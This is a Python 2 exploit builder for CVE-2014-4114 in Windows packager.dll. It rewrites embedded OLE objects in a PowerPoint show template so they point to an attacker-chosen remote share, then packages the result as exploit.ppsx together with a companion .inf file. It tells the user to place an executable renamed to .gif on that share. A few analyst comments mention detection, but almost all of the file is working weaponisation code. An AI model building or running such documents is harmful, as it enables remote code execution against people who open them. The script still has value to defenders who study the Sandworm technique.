# Builder script for a PowerPoint show (.ppsx) whose embedded OLE packager
# objects refer to files on a remote share. The banner printed below ties it
# to CVE-2014-4114 in packager.dll.
#
# Arguments (read from sys.argv): HOST SHARE FILENAME
#
# Processing order:
#   1. unpack the template archive expl.zip into ./tmp
#   2. rewrite ppt/embeddings/oleObject1.bin and oleObject2.bin, swapping the
#      template placeholders (host '10.0.0.34', share 'public', file names
#      'slide1.gif' / 'slide1.inf') for the supplied values
#   3. re-zip ./tmp into out/exploit.ppsx
#   4. write out/<name>.inf from the expl.inf template
#   5. delete ./tmp and print the two UNC paths the document refers to
#
# Analyst notes: the host, share and file names end up inside
# ppt/embeddings/oleObject*.bin, so those parts of the package are where a
# reviewer would look for the remote reference. The companion files are a
# .inf and an executable renamed to .gif (per the final message).
# NOTE(review): an Office process reading that .inf/.gif pair from a remote
# share is the likely network-side observable - confirm against telemetry.
#
# Python 2 only: uses print statements and dict.iteritems().
import os
import sys
import zipfile

TEMPLATE_ARCHIVE = 'expl.zip'
EXTRACT_DIR = "./tmp"


def _copy_with_replacements(src_path, dst_path, replacements):
    # Copy src_path to dst_path line by line, applying every
    # placeholder -> value substitution in `replacements` to each line.
    # Files are opened in text mode, as in the template workflow.
    reader = open(src_path)
    writer = open(dst_path, 'w')
    for chunk in reader:
        for placeholder, value in replacements.iteritems():
            chunk = chunk.replace(placeholder, value)
        writer.write(chunk)
    reader.close()
    writer.close()


# Positional arguments; a missing one raises IndexError before any output.
host = sys.argv[1]
share = sys.argv[2]
mal_file = sys.argv[3]

print "\nPoC exploit builder v0.1 for logical OLE flaw in packager.dll [CVE-2014-4114] by vlad@sensepost.com @v1ad_o\n"
print "Building ... \n "

# Normalise the file name: remove spaces, drop the last four characters
# (presumably a three-letter extension plus the dot) and lower-case it.
mal_file = mal_file.replace(' ', '')[:-4].lower()

# Unpack every member of the template archive into the scratch directory.
fh = open(TEMPLATE_ARCHIVE, 'rb')
z = zipfile.ZipFile(fh)
for member in z.namelist():
    z.extract(member, EXTRACT_DIR)
fh.close()

os.mkdir('out')
os.chdir('tmp')

# First embedded object: points at <name>.gif on the share.
_copy_with_replacements(
    'ppt/embeddings/oleObject1.bin',
    'ppt/embeddings/1.bin',
    {'10.0.0.34': host, 'public': share, 'slide1.gif': mal_file + '.gif'},
)
os.remove('ppt/embeddings/oleObject1.bin')
os.rename('ppt/embeddings/1.bin', 'ppt/embeddings/oleObject1.bin')

# Second embedded object: points at <name>.inf on the share.
_copy_with_replacements(
    'ppt/embeddings/oleObject2.bin',
    'ppt/embeddings/2.bin',
    {'10.0.0.34': host, 'public': share, 'slide1.inf': mal_file + '.inf'},
)
os.remove('ppt/embeddings/oleObject2.bin')
os.rename('ppt/embeddings/2.bin', 'ppt/embeddings/oleObject2.bin')

# Repackage the scratch tree; relies on an external `zip` binary and a shell.
os.system("zip -q -9 -r ../out/exploit.ppsx * ")
os.chdir('..')

# Companion .inf: the template's 'slide1' name is replaced with the new one.
_copy_with_replacements(
    'expl.inf',
    'out/' + mal_file + '.inf',
    {'slide1': mal_file},
)

# Scratch directory clean-up; relies on an external `rm` binary and a shell.
os.system("rm -rf tmp")

# UNC locations the generated document refers to.
unc_base = '*\\\\' + host + '\\' + share + '\\' + mal_file
print 'Copy the .inf .gif (renamed file.exe=>file.gif) to:\n'
print unc_base + '.gif\n'
print unc_base + '.inf\n'
print 'Done - collect your files from the [out] folder.\n'